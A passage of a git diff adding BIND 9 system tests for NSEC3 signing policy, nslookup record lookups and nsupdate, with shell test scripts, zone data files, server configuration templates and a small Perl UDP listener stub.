echo_i "check NXDOMAIN response has correct NSEC3 1 ${FLAGS} ${ITERATIONS} ${SALT} for zone ${ZONE} ($n)" + ret=0 + retry_quiet 10 _check_nsec3_nxdomain || log_error "bad NXDOMAIN response for zone ${ZONE}" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +start_time="$(TZ=UTC date +%s)" +status=0 +n=0 + +# Zone: nsec-to-nsec3.kasp. +set_zone_policy "nsec-to-nsec3.kasp" "nsec" +set_server "ns3" "10.53.0.3" +echo_i "initial check zone ${ZONE}" +check_nsec +dnssec_verify + +# Zone: nsec3.kasp. +set_zone_policy "nsec3.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-dynamic.kasp. +set_zone_policy "nsec3-dynamic.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-change.kasp. +set_zone_policy "nsec3-change.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-dynamic-change.kasp. +set_zone_policy "nsec3-dynamic-change.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-dynamic-to-inline.kasp. +set_zone_policy "nsec3-dynamic-to-inline.kasp" "nsec3" 1 3600 +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 + +# Zone: nsec3-inline-to-dynamic.kasp. +set_zone_policy "nsec3-inline-to-dynamic.kasp" "nsec3" 1 3600 +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 + +# Zone: nsec3-to-nsec.kasp. +set_zone_policy "nsec3-to-nsec.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-to-optout.kasp. +set_zone_policy "nsec3-to-optout.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-from-optout.kasp. +set_zone_policy "nsec3-from-optout.kasp" "optout" +set_nsec3param "1" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-other.kasp. +set_zone_policy "nsec3-other.kasp" "nsec3-other" +set_nsec3param "1" "11" "0" +echo_i "initial check zone ${ZONE}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-xfr-inline.kasp. +# This is a secondary zone, where the primary is signed with NSEC3 but +# the dnssec-policy dictates NSEC. +set_zone_policy "nsec3-xfr-inline.kasp" "nsec" 1 3600 +echo_i "initial check zone ${ZONE}" +check_nsec + +# Zone: nsec3-dynamic-update-inline.kasp. +set_zone_policy "nsec3-dynamic-update-inline.kasp" "nsec" 1 3600 +echo_i "initial check zone ${ZONE}" +check_nsec + +n=$((n+1)) +echo_i "dynamic update dnssec-policy zone ${ZONE} with NSEC3 ($n)" +ret=0 +$NSUPDATE > update.out.$ZONE.test$n 2>&1 << END || ret=1 +server 10.53.0.3 ${PORT} +zone ${ZONE}. +update add 04O18462RI5903H8RDVL0QDT5B528DUJ.${ZONE}. 3600 NSEC3 0 0 0 408A4B2D412A4E95 1JMDDPMTFF8QQLIOINSIG4CR9OTICAOC A RRSIG +send +END +wait_for_log 10 "updating zone '${ZONE}/IN': update failed: explicit NSEC3 updates are not allowed in secure zones (REFUSED)" ns3/named.run || ret=1 +check_nsec + +# Reconfig named. +ret=0 +echo_i "reconfig dnssec-policy to trigger nsec3 rollovers" +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 + +# Zone: nsec-to-nsec3.kasp. (reconfigured) +set_zone_policy "nsec-to-nsec3.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "check zone ${ZONE} after reconfig" +check_nsec3 +dnssec_verify + +# Zone: nsec3.kasp. (same) +set_zone_policy "nsec3.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "check zone ${ZONE} after reconfig" +check_nsec3 +dnssec_verify + +# Zone: nsec3-dyamic.kasp. (same) +set_zone_policy "nsec3-dynamic.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "check zone ${ZONE} after reconfig" +check_nsec3 +dnssec_verify + +# Zone: nsec3-change.kasp. (reconfigured) +set_zone_policy "nsec3-change.kasp" "nsec3-other" +set_nsec3param "1" "11" "0" +echo_i "check zone ${ZONE} after reconfig" +check_nsec3 +dnssec_verify + +# Zone: nsec3-dynamic-change.kasp. (reconfigured) +set_zone_policy "nsec3-dynamic-change.kasp" "nsec3-other" +set_nsec3param "1" "11" "0" +echo_i "check zone ${ZONE} after reconfig" +check_nsec3 +dnssec_verify + +# Zone: nsec3-dynamic-to-inline.kasp. (same) +set_zone_policy "nsec3-dynamic-to-inline.kasp" "nsec3" 1 3600 +set_nsec3param "0" "5" "8" +echo_i "check zone ${ZONE} after reconfig" +check_nsec3 + +# Zone: nsec3-inline-to-dynamic.kasp. (same) +set_zone_policy "nsec3-inline-to-dynamic.kasp" "nsec3" 1 3600 +set_nsec3param "0" "5" "8" +echo_i "initial check zone ${ZONE}" +check_nsec3 + +# Zone: nsec3-to-nsec.kasp. (reconfigured) +set_zone_policy "nsec3-to-nsec.kasp" "nsec" +set_nsec3param "1" "11" "0" +echo_i "check zone ${ZONE} after reconfig" +check_nsec +dnssec_verify + +# Zone: nsec3-to-optout.kasp. (reconfigured) +# DISABLED: +# There is a bug in the nsec3param building code that thinks when the +# optout bit is changed, the chain already exists. [GL #2216] +#set_zone_policy "nsec3-to-optout.kasp" "optout" +#set_nsec3param "1" "5" "8" +#echo_i "check zone ${ZONE} after reconfig" +#check_nsec3 +#dnssec_verify + +# Zone: nsec3-from-optout.kasp. (reconfigured) +# DISABLED: +# There is a bug in the nsec3param building code that thinks when the +# optout bit is changed, the chain already exists. [GL #2216] +#set_zone_policy "nsec3-from-optout.kasp" "nsec3" +#set_nsec3param "0" "5" "8" +#echo_i "check zone ${ZONE} after reconfig" +#check_nsec3 +#dnssec_verify + +# Zone: nsec3-other.kasp. (same) +set_zone_policy "nsec3-other.kasp" "nsec3-other" +set_nsec3param "1" "11" "0" +echo_i "check zone ${ZONE} after reconfig" +check_nsec3 +dnssec_verify + +# Using rndc signing -nsec3param (should fail) +set_zone_policy "nsec3-change.kasp" "nsec3-other" +echo_i "use rndc signing -nsec3param ${ZONE} to change NSEC3 settings" +rndccmd $SERVER signing -nsec3param 1 1 12 ffff $ZONE > rndc.signing.test$n.$ZONE || log_error "failed to call rndc signing -nsec3param $ZONE" +grep "zone uses dnssec-policy, use rndc dnssec command instead" rndc.signing.test$n.$ZONE > /dev/null || log_error "rndc signing -nsec3param should fail" +check_nsec3 +dnssec_verify + +# Test NSEC3 and NSEC3PARAM is the same after restart +set_zone_policy "nsec3.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "check zone ${ZONE} before restart" +check_nsec3 +dnssec_verify + +# Restart named, NSEC3 should stay the same. +ret=0 +echo "stop ns3" +stop_server --use-rndc --port ${CONTROLPORT} ${DIR} || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +ret=0 +echo "start ns3" +start_server --noclean --restart --port ${PORT} ${DIR} +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +prevsalt="${SALT}" +set_zone_policy "nsec3.kasp" "nsec3" +set_nsec3param "0" "5" "8" +SALT="${prevsalt}" +echo_i "check zone ${ZONE} after restart has salt ${SALT}" +check_nsec3 +dnssec_verify + +# Zone: nsec3-fails-to-load.kasp. (should be fixed after reload) +cp ns3/template.db.in ns3/nsec3-fails-to-load.kasp.db +rndc_reload ns3 10.53.0.3 + +set_zone_policy "nsec3-fails-to-load.kasp" "nsec3" +set_nsec3param "0" "5" "8" +echo_i "check zone ${ZONE} after reload" +check_nsec3 +dnssec_verify + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/nslookup/clean.sh b/bin/tests/system/nslookup/clean.sh new file mode 100644 index 0000000..439f90d --- /dev/null +++ b/bin/tests/system/nslookup/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns1/example.db +rm -f nslookup.out* +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/nslookup/ns1/example.net.db b/bin/tests/system/nslookup/ns1/example.net.db new file mode 100644 index 0000000..73aeeb1 --- /dev/null +++ b/bin/tests/system/nslookup/ns1/example.net.db @@ -0,0 +1,31 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 + +@ 86400 IN SOA ns1 hostmaster ( + 1397051952 ; "SER0" + 5 + 5 + 1814400 + 3600 ) +@ NS ns1 +ns1 A 10.53.0.1 + +a-only A 1.2.3.4 +aaaa-only AAAA 2001::ffff + +dual A 1.2.3.4 + AAAA 2001::ffff + +cname-a-only CNAME a-only +cname-aaaa-only CNAME aaaa-only +cname-dual CNAME dual diff --git a/bin/tests/system/nslookup/ns1/named.conf.in b/bin/tests/system/nslookup/ns1/named.conf.in new file mode 100644 index 0000000..67b4f4f --- /dev/null +++ b/bin/tests/system/nslookup/ns1/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "example.net" { + type primary; + file "example.net.db"; +}; diff --git a/bin/tests/system/nslookup/setup.sh b/bin/tests/system/nslookup/setup.sh new file mode 100644 index 0000000..8e4016e --- /dev/null +++ b/bin/tests/system/nslookup/setup.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +$SHELL ../genzone.sh 1 >ns1/example.db + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/nslookup/tests.sh b/bin/tests/system/nslookup/tests.sh new file mode 100644 index 0000000..2be4eac --- /dev/null +++ b/bin/tests/system/nslookup/tests.sh @@ -0,0 +1,112 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "Check that domain names that are too big when applying a search list entry are handled cleanly ($n)" +ret=0 +l=012345678901234567890123456789012345678901234567890123456789012 +t=0123456789012345678901234567890123456789012345678901234567890 +d=$l.$l.$l.$t +$NSLOOKUP -port=${PORT} -domain=$d -type=soa example 10.53.0.1 > nslookup.out${n} || ret=1 +grep "origin = ns1.example" nslookup.out${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check A only lookup" +ret=0 +$NSLOOKUP -port=${PORT} a-only.example.net 10.53.0.1 > nslookup.out${n} || ret=1 +lines=`grep "Server:" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep a-only.example.net nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +grep "1.2.3.4" nslookup.out${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check AAAA only lookup" +ret=0 +$NSLOOKUP -port=${PORT} aaaa-only.example.net 10.53.0.1 > nslookup.out${n} || ret=1 +lines=`grep "Server:" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep aaaa-only.example.net nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +grep "2001::ffff" nslookup.out${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check dual A + AAAA lookup" +ret=0 +$NSLOOKUP -port=${PORT} dual.example.net 10.53.0.1 > nslookup.out${n} || ret=1 +lines=`grep "Server:" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep dual.example.net nslookup.out${n} | wc -l` +test $lines = 2 || ret=1 +grep "1.2.3.4" nslookup.out${n} > /dev/null || ret=1 +grep "2001::ffff" nslookup.out${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check CNAME to A only lookup" +ret=0 +$NSLOOKUP -port=${PORT} cname-a-only.example.net 10.53.0.1 > nslookup.out${n} || ret=1 +lines=`grep "Server:" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep "canonical name" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep a-only.example.net nslookup.out${n} | grep -v "canonical name" | wc -l` +test $lines = 1 || ret=1 +grep "1.2.3.4" nslookup.out${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check CNAME to AAAA only lookup" +ret=0 +$NSLOOKUP -port=${PORT} cname-aaaa-only.example.net 10.53.0.1 > nslookup.out${n} || ret=1 +lines=`grep "Server:" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep "canonical name" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep aaaa-only.example.net nslookup.out${n} | grep -v "canonical name" |wc -l` +test $lines = 1 || ret=1 +grep "2001::ffff" nslookup.out${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Check CNAME to dual A + AAAA lookup" +ret=0 +$NSLOOKUP -port=${PORT} cname-dual.example.net 10.53.0.1 > nslookup.out${n} || ret=1 +lines=`grep "Server:" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep "canonical name" nslookup.out${n} | wc -l` +test $lines = 1 || ret=1 +lines=`grep dual.example.net nslookup.out${n} | grep -v "canonical name" | wc -l` +test $lines = 2 || ret=1 +grep "1.2.3.4" nslookup.out${n} > /dev/null || ret=1 +grep "2001::ffff" nslookup.out${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/nsupdate/ans4/ans.pl b/bin/tests/system/nsupdate/ans4/ans.pl new file mode 100644 index 0000000..d4299c4 --- /dev/null +++ b/bin/tests/system/nsupdate/ans4/ans.pl @@ -0,0 +1,60 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use IO::Socket; +use IO::File; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $server_addr = "10.53.0.4"; +if (@ARGV > 0) { + $server_addr = @ARGV[0]; +} + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +print "listening on $server_addr:$localport.\n"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +# Main +for (;;) { + my $rin; + my $rout; + + $rin = ''; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + } +} diff --git a/bin/tests/system/nsupdate/clean.sh b/bin/tests/system/nsupdate/clean.sh new file mode 100644 index 0000000..1746ec1 --- /dev/null +++ b/bin/tests/system/nsupdate/clean.sh @@ -0,0 +1,69 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f */*.jnl +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run */ans.run +rm -f */named.run.prev +rm -f Kxxx.* +rm -f check.out.* +rm -f dig.out.* +rm -f jp.out.ns3.* +rm -f nextpart.out.* +rm -f ns*/managed-keys.bind* ns*/*.mkeys* +rm -f ns*/named.lock +rm -f ns1/example.db ns1/unixtime.db ns1/yyyymmddvv.db ns1/update.db ns1/other.db ns1/keytests.db +rm -f ns1/many.test.db +rm -f ns1/maxjournal.db +rm -f ns1/md5.key ns1/sha1.key ns1/sha224.key ns1/sha256.key ns1/sha384.key +rm -f ns1/sample.db +rm -f ns1/sha512.key ns1/ddns.key +rm -f ns10/_default.tsigkeys +rm -f ns10/example.com.db +rm -f ns10/in-addr.db +rm -f ns2/example.bk +rm -f ns2/sample.db +rm -f ns2/update.bk ns2/update.alt.bk +rm -f ns3/*.signed +rm -f ns3/K* +rm -f ns3/delegation.test.db +rm -f ns3/dnskey.test.db +rm -f ns3/dsset-* +rm -f ns3/example.db +rm -f ns3/multisigner.test.db +rm -f ns3/many.test.bk +rm -f ns3/nsec3param.test.db +rm -f ns3/too-big.test.db +rm -f ns5/local.db +rm -f ns6/in-addr.db +rm -f ns7/_default.tsigkeys +rm -f ns7/example.com.db +rm -f ns7/in-addr.db +rm -f ns8/_default.tsigkeys +rm -f ns8/example.com.db +rm -f ns8/in-addr.db +rm -f ns9/_default.tsigkeys +rm -f ns9/denyname.example.db +rm -f ns9/example.com.db +rm -f ns9/in-addr.db +rm -f perl.update_test.out +rm -f nsupdate.out* +rm -f typelist.out.* +rm -f update.out.* +rm -f update.in.* +rm -f verylarge diff --git a/bin/tests/system/nsupdate/commandlist b/bin/tests/system/nsupdate/commandlist new file mode 100644 index 0000000..41c8049 --- /dev/null +++ b/bin/tests/system/nsupdate/commandlist @@ -0,0 +1,15 @@ +server 127.0.0.1 +server 127.0.0.1 port +update +update delete +update delete dummy +update delete dummy in +update delete dummy in a +update delete dummy in a 127.0.0.1 +update add +update add domain +update add domain 0 +update add domain 0 in +update add domain 0 in a +update add domain 0 a +update add domain 0 a in diff --git a/bin/tests/system/nsupdate/knowngood.ns1.after b/bin/tests/system/nsupdate/knowngood.ns1.after new file mode 100644 index 0000000..4114159 --- /dev/null +++ b/bin/tests/system/nsupdate/knowngood.ns1.after @@ -0,0 +1,99 @@ +example.nil. 300 IN SOA ns1.example.nil. hostmaster.example.nil. 2 2000 2000 1814400 3600 +example.nil. 300 IN NS ns1.example.nil. +example.nil. 300 IN NS ns2.example.nil. +*.example.nil. 300 IN MX 10 mail.example.nil. +a.example.nil. 300 IN TXT "foo foo foo" +a.example.nil. 300 IN PTR foo.net. +a01.example.nil. 3600 IN A 0.0.0.0 +a02.example.nil. 3600 IN A 255.255.255.255 +a601.example.nil. 3600 IN AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01.example.nil. 3600 IN AFSDB 0 hostname.example.nil. +afsdb02.example.nil. 3600 IN AFSDB 65535 . +b.example.nil. 300 IN CNAME foo.net. +c.example.nil. 300 IN A 73.80.65.49 +cert01.example.nil. 3600 IN CERT 65534 65535 PRIVATEOID MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +cname01.example.nil. 3600 IN CNAME cname-target. +cname02.example.nil. 3600 IN CNAME cname-target.example.nil. +cname03.example.nil. 3600 IN CNAME . +d.example.nil. 300 IN A 73.80.65.49 +dname01.example.nil. 3600 IN DNAME dname-target. +dname02.example.nil. 3600 IN DNAME dname-target.example.nil. +dname03.example.nil. 3600 IN DNAME . +e.example.nil. 300 IN MX 10 mail.example.nil. +e.example.nil. 300 IN TXT "one" +e.example.nil. 300 IN TXT "two" +e.example.nil. 300 IN TXT "three" +e.example.nil. 300 IN A 73.80.65.49 +e.example.nil. 300 IN A 73.80.65.50 +e.example.nil. 300 IN A 73.80.65.51 +e.example.nil. 300 IN A 73.80.65.52 +f.example.nil. 300 IN A 73.80.65.52 +gpos01.example.nil. 3600 IN GPOS "-22.6882" "116.8652" "250.0" +gpos02.example.nil. 3600 IN GPOS "" "" "" +hinfo01.example.nil. 3600 IN HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02.example.nil. 3600 IN HINFO "PC" "NetBSD" +isdn01.example.nil. 3600 IN ISDN "isdn-address" +isdn02.example.nil. 3600 IN ISDN "isdn-address" "subaddress" +isdn03.example.nil. 3600 IN ISDN "isdn-address" +isdn04.example.nil. 3600 IN ISDN "isdn-address" "subaddress" +key01.example.nil. 3600 IN KEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +kx01.example.nil. 3600 IN KX 10 kdc.example.nil. +kx02.example.nil. 3600 IN KX 10 . +loc01.example.nil. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02.example.nil. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01.example.nil. 3600 IN MG madname.example.nil. +mb02.example.nil. 3600 IN MG . +mg01.example.nil. 3600 IN MG mgmname.example.nil. +mg02.example.nil. 3600 IN MG . +minfo01.example.nil. 3600 IN MINFO rmailbx.example.nil. emailbx.example.nil. +minfo02.example.nil. 3600 IN MINFO . . +mr01.example.nil. 3600 IN MR mrname.example.nil. +mr02.example.nil. 3600 IN MR . +mx01.example.nil. 3600 IN MX 10 mail.example.nil. +mx02.example.nil. 3600 IN MX 10 . +naptr01.example.nil. 3600 IN NAPTR 0 0 "" "" "" . +naptr02.example.nil. 3600 IN NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +ns1.example.nil. 300 IN A 10.53.0.1 +ns2.example.nil. 300 IN A 10.53.0.2 +nsap-ptr01.example.nil. 3600 IN NSAP-PTR . +nsap-ptr01.example.nil. 3600 IN NSAP-PTR foo. +nsap01.example.nil. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02.example.nil. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01.example.nil. 3600 IN NXT a.secure.example.nil. NS SOA MX SIG KEY LOC NXT +nxt02.example.nil. 3600 IN NXT . NSAP-PTR NXT +nxt03.example.nil. 3600 IN NXT . A +nxt04.example.nil. 3600 IN NXT . 127 +ptr01.example.nil. 3600 IN PTR example.nil. +px01.example.nil. 3600 IN PX 65535 foo. bar. +px02.example.nil. 3600 IN PX 65535 . . +rp01.example.nil. 3600 IN RP mbox-dname.example.nil. txt-dname.example.nil. +rp02.example.nil. 3600 IN RP . . +rt01.example.nil. 3600 IN RT 0 intermediate-host.example.nil. +rt02.example.nil. 3600 IN RT 65535 . +s.example.nil. 300 IN NS ns.s.example.nil. +ns.s.example.nil. 300 IN A 73.80.65.49 +sig01.example.nil. 3600 IN SIG NXT 1 3 3600 20000102030405 19961211100908 2143 foo.example.nil. MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +srv01.example.nil. 3600 IN SRV 0 0 0 . +srv02.example.nil. 3600 IN SRV 65535 65535 65535 old-slow-box.example.com. +txt01.example.nil. 3600 IN TXT "foo" +txt02.example.nil. 3600 IN TXT "foo" "bar" +txt03.example.nil. 3600 IN TXT "foo" +txt04.example.nil. 3600 IN TXT "foo" "bar" +txt05.example.nil. 3600 IN TXT "foo bar" +txt06.example.nil. 3600 IN TXT "foo bar" +txt07.example.nil. 3600 IN TXT "foo bar" +txt08.example.nil. 3600 IN TXT "foo\010bar" +txt09.example.nil. 3600 IN TXT "foo\010bar" +txt10.example.nil. 3600 IN TXT "foo bar" +txt11.example.nil. 3600 IN TXT "\"foo\"" +txt12.example.nil. 3600 IN TXT "\"foo\"" +u.example.nil. 300 IN TXT "txt-not-in-nxt" +a.u.example.nil. 300 IN A 73.80.65.49 +b.u.example.nil. 300 IN A 73.80.65.49 +updated.example.nil. 600 IN TXT "Foo" +updated.example.nil. 600 IN A 10.10.10.1 +wks01.example.nil. 3600 IN WKS 10.0.0.1 6 0 1 2 21 23 +wks02.example.nil. 3600 IN WKS 10.0.0.1 17 0 1 2 53 +wks03.example.nil. 3600 IN WKS 10.0.0.2 6 65535 +x2501.example.nil. 3600 IN X25 "123456789" +example.nil. 300 IN SOA ns1.example.nil. hostmaster.example.nil. 2 2000 2000 1814400 3600 diff --git a/bin/tests/system/nsupdate/knowngood.ns1.afterstop b/bin/tests/system/nsupdate/knowngood.ns1.afterstop new file mode 100644 index 0000000..e871d4c --- /dev/null +++ b/bin/tests/system/nsupdate/knowngood.ns1.afterstop @@ -0,0 +1,3 @@ +updated4.example.nil. 600 IN A 10.10.10.3 +example.nil. 300 IN NS ns1.example.nil. +example.nil. 300 IN NS ns2.example.nil. diff --git a/bin/tests/system/nsupdate/knowngood.ns1.before b/bin/tests/system/nsupdate/knowngood.ns1.before new file mode 100644 index 0000000..4a5e630 --- /dev/null +++ b/bin/tests/system/nsupdate/knowngood.ns1.before @@ -0,0 +1,98 @@ +example.nil. 300 IN SOA ns1.example.nil. hostmaster.example.nil. 1 2000 2000 1814400 3600 +example.nil. 300 IN NS ns1.example.nil. +example.nil. 300 IN NS ns2.example.nil. +*.example.nil. 300 IN MX 10 mail.example.nil. +a.example.nil. 300 IN TXT "foo foo foo" +a.example.nil. 300 IN PTR foo.net. +a01.example.nil. 3600 IN A 0.0.0.0 +a02.example.nil. 3600 IN A 255.255.255.255 +a601.example.nil. 3600 IN AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01.example.nil. 3600 IN AFSDB 0 hostname.example.nil. +afsdb02.example.nil. 3600 IN AFSDB 65535 . +b.example.nil. 300 IN CNAME foo.net. +c.example.nil. 300 IN A 73.80.65.49 +cert01.example.nil. 3600 IN CERT 65534 65535 PRIVATEOID MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +cname01.example.nil. 3600 IN CNAME cname-target. +cname02.example.nil. 3600 IN CNAME cname-target.example.nil. +cname03.example.nil. 3600 IN CNAME . +d.example.nil. 300 IN A 73.80.65.49 +dname01.example.nil. 3600 IN DNAME dname-target. +dname02.example.nil. 3600 IN DNAME dname-target.example.nil. +dname03.example.nil. 3600 IN DNAME . +e.example.nil. 300 IN MX 10 mail.example.nil. +e.example.nil. 300 IN TXT "one" +e.example.nil. 300 IN TXT "two" +e.example.nil. 300 IN TXT "three" +e.example.nil. 300 IN A 73.80.65.49 +e.example.nil. 300 IN A 73.80.65.50 +e.example.nil. 300 IN A 73.80.65.51 +e.example.nil. 300 IN A 73.80.65.52 +f.example.nil. 300 IN A 73.80.65.52 +gpos01.example.nil. 3600 IN GPOS 